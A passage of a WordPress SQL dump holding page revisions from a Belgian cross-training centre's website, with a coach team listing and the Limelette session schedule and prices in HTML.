5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Fondateur GLFE consulting\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"198\" height=\"259\" /></a></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-06 21:06:21', '2013-11-06 21:06:21', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0),
(393, 1, '2013-11-06 21:16:13', '2013-11-06 21:16:13', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Pierrard</h2>\r\n<h5>Gérante\r\nCoach\r\nDiététicienne</h5>\r\n<ul>\r\n	<li>Baccalauréat en diététique</li>\r\n	<li>Spécialisation en diététique du sport</li>\r\n	<li>Enseignante en éducation nutritionnelle</li>\r\n	<li>Pratiquante de judo, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Damien Pierrard</h2>\r\n<h5>Fondateur Pierrard Sports\r\nFormateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Licence en éducation physique</li>\r\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\r\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\r\n	<li>Préparateur physique</li>\r\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Guélor Luabeya</h2>\r\n<h5>Formateur coach\r\nCoach</h5>\r\n<ul>\r\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\r\n	<li>Premier Trainer National Belge</li>\r\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\r\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Matthieu Gille</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Préparateur physique en sport collectif et individuel</li>\r\n	<li>Brevet A de l’URBSFA</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Bertrand Bauwin</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Spécialisation en psychomotricité</li>\r\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julien Meulemans</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Baccalauréat en éducation physique</li>\r\n	<li>Maitre psychomotricien</li>\r\n	<li>Formation de personal trainer</li>\r\n	<li>Formation en Streching Global Actif (SGA)</li>\r\n	<li>Formation à l’initiation au golf et snag golf</li>\r\n	<li>Enseignant en éducation physique</li>\r\n	<li>Pratiquant de foot et de ski</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><img class=\"alignnone size-full wp-image-390\" alt=\"chloe_chmiel_pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/05/chloe_chmiel_pti.jpg\" width=\"108\" /></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Chloé Chmiel</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Master en kinésithérapie</li>\r\n	<li>Spécialisation en kinésithérapie sportive et thérapie manuelle</li>\r\n	<li>Kiné Nat.3 basket de Belgrade</li>\r\n	<li>Pratiquante de course à pied et danses sportives</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"arrondi\">\r\n<table style=\"border: 1px; width: 100%; height: 290px;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2>Julie Rogge</h2>\r\n<h5>Coach</h5>\r\n<ul>\r\n	<li>Licence en Education Physique</li>\r\n	<li>Spécialisation en préparation physique et entrainement du sportif</li>\r\n	<li>Enseignante en éducation physique</li>\r\n	<li>Entraîneur de volley-ball</li>\r\n	<li>Pratiquant de volley-ball, natation et course à pied</li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-v1', '', '', '2013-11-06 21:16:13', '2013-11-06 21:16:13', '', 20, 'http://www.crosstrainingcenter.be/20-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(395, 1, '2013-11-14 21:20:57', '2013-11-14 21:20:57', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\nCardio: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\nCircuit training: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\nRenforcement musculaire: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1></h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1></h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1></h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1></h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:20:57', '2013-11-14 21:20:57', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(396, 1, '2013-11-14 21:23:43', '2013-11-14 21:23:43', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:23:43', '2013-11-14 21:23:43', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
(397, 1, '2013-11-14 21:27:07', '2013-11-14 21:27:07', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenu\">\r\n<div align=\"center\">\r\n\r\n<a title=\"Les séances – Namur\" href=\"http://www.crosstrainingcenter.be/les-seances-namur/\">Namur</a>\r\n\r\n</div>\r\n</div></td>\r\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\r\n<div class=\"sousmenuhoover\">\r\n<div align=\"center\">\r\n\r\nLimelette\r\n\r\n</div>\r\n</div></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h1></h1>\r\n<h1>Team Training - Limelette :</h1>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 pers.). Nous vous proposons 4 types de séances décrites ci-dessous\r\n\r\n&nbsp;\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitreh\">LUNDI</td>\r\n<td class=\"ttitreh\">MARDI</td>\r\n<td class=\"ttitreh\">MERCREDI</td>\r\n<td class=\"ttitreh\">JEUDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"ttrx\"><b>18h</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b></b>18h\r\nCardio</td>\r\n<td class=\"trip\"><b>18h</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>17h30</b>\r\nRenforcement musculaire</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"trip\"><b>18h45</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>18h45</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>18h45</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>18h15</b>\r\nCircuit training</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"tcardio\"><b>19h30</b>\r\nCardio</td>\r\n<td class=\"trip\"><b>19h30</b>\r\nCircuit training</td>\r\n<td class=\"ttrx\"><b>19h30</b>\r\nRenforcement musculaire</td>\r\n<td class=\"tcardio\"><b>19h</b>\r\nCardio</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n<span style=\"text-decoration: underline; background: #A9F5F2;\"><strong>Cardio</strong></span>: Circuit permettant de développer votre endurance musculaire et cardiovasculaire! Idéal pour brûler un maximum de calories et perdre du poids (conseillé avec un programme alimentaire)!\r\n<br>\r\n<span style=\"text-decoration: underline; background: #A9F5A9;\"><strong>Circuit training</strong></span>: Travaillez de manière fun sur un circuit ultra-complet, accessible à tous et adapté à votre niveau! Relevez des challenges et augmentez votre confiance en vous! \r\n<br>\r\n<span style=\"text-decoration: underline; background: #F2F5A9;\"><strong>Renforcement musculaire</strong></span>: Excellent circuit pour raffermir, muscler votre corps en profondeur avec ou sans prise de volume! Vous utiliserez entre autre le TRX suspension training (méthode d\'entrainement révolutionnaire basée sur le poids du corps), le Rip Trainer, le kettlebell...\r\n<h1>&nbsp;</h1>\r\n<h2>Duo Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nEntrainements à deux personnes sous la supervision d’un coach.\r\n<h1>&nbsp;</h1>\r\n<h2>Personal Training - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nUn coach par personne, l’idéal pour progresser plus rapidement!\r\n<h1>&nbsp;</h1>\r\n<h2>Coaching nutritionnel - Limelette :</h2>\r\n<a title=\"Contact\" href=\"http://www.crosstrainingcenter.be/?page_id=9\">Uniquement sur rdv</a>\r\nRendez-vous avec une diététicienne pour améliorer votre santé.\r\n<h1>&nbsp;</h1>\r\n<h2>Prix</h2>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitrehprix\">Team Training</td>\r\n<td class=\"tcelluleprix\">1 séance : 9.00€\r\n1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 6 mois illimité : 399.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Package alimentation + sport</td>\r\n<td class=\"tcelluleprix\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr>\r\n<td class=\"ttitrehprix\">Coaching nutritionnel</td>\r\n<td class=\"tcelluleprix\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€\r\nSuivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>', 'Les séances - Limelette', '', 'inherit', 'open', 'open', '', '361-revision-v1', '', '', '2013-11-14 21:27:07', '2013-11-14 21:27:07', '', 361, 'http://www.crosstrainingcenter.be/361-revision-v1/', 0, 'revision', '', 0),
